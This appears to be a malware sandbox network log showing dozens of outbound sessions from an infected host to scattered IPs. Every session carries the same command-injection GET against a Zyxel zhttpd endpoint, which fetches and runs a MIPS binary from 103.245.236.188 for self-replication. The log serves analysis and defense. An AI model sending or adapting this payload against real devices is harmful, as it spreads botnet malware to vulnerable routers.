                                    Jan 13, 2024 19:01:59.701066017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    448192.168.2.134086037.241.191.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701080084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    449192.168.2.134829860.163.219.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701087952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    450192.168.2.1345780134.75.242.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701087952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    451192.168.2.1348772211.18.105.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701100111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    452192.168.2.134538890.106.137.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701153994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    453192.168.2.1346086206.15.109.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701174021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    454192.168.2.136042083.202.100.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701248884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    455192.168.2.134717858.42.207.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701275110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    456192.168.2.1337456202.188.168.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701314926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    457192.168.2.1355182100.49.92.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701349974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    458192.168.2.135676279.177.71.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701365948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    459192.168.2.1355444150.229.80.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701411009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    460192.168.2.136051086.201.237.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701448917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    461192.168.2.133608831.255.193.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701482058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    462192.168.2.1332840166.213.175.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701523066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    463192.168.2.1333448189.28.1.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701561928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    464192.168.2.1343034176.131.79.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701603889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    465192.168.2.134905417.224.13.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701643944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    466192.168.2.133692895.159.202.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701649904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    467192.168.2.1347596111.3.92.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701673985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    468192.168.2.13512942.36.30.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701735020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    469192.168.2.13437645.43.46.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701783895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    470192.168.2.135188696.77.43.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701814890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    471192.168.2.1336518162.118.71.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701828957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    472192.168.2.1355232171.223.44.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701848030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    473192.168.2.1358320145.181.22.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701875925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    474192.168.2.133833244.230.23.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701920033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    475192.168.2.135193074.126.95.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701951027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    476192.168.2.1334506125.209.170.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701952934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    477192.168.2.1334880170.255.148.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.701982021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    478192.168.2.136091842.163.124.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702039003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    479192.168.2.13346781.98.32.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702085972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    480192.168.2.134486641.105.196.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702086926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    481192.168.2.1335838217.0.158.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702152967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    482192.168.2.1343642170.192.75.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702181101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    483192.168.2.1343932142.83.227.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702198029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    484192.168.2.1349608117.112.99.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702249050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    485192.168.2.13456242.215.104.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702280045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    486192.168.2.134452678.103.108.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702321053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    487192.168.2.1348418210.226.225.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702353001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    488192.168.2.134885862.28.209.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702361107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    489192.168.2.135909285.19.149.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702403069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    490192.168.2.1334388220.55.2.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702433109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    491192.168.2.135945640.77.52.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702470064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    492192.168.2.1353176130.216.31.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702533960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    493192.168.2.134452466.16.6.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702563047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    494192.168.2.1356910136.231.120.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702589989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    495192.168.2.1345790130.109.55.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702604055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    496192.168.2.1342050216.245.84.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702620983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    497192.168.2.134917417.33.193.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702640057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    498192.168.2.1335954170.0.24.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702666998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    499192.168.2.1359628183.64.246.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702701092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    500192.168.2.135073493.156.116.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702723980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    501192.168.2.1343382135.174.3.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702756882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    502192.168.2.134853031.114.10.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702786922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    503192.168.2.1339750218.66.59.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702816963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    504192.168.2.134657224.3.150.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702841997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    505192.168.2.1348464145.180.120.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702862978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    506192.168.2.135681864.83.59.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702894926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    507192.168.2.134485045.169.156.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702914000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    508192.168.2.1359694183.122.34.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702922106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    509192.168.2.1335068200.170.240.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.702981949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    510192.168.2.134862234.111.203.23443
                                    TimestampBytes transferredDirectionData
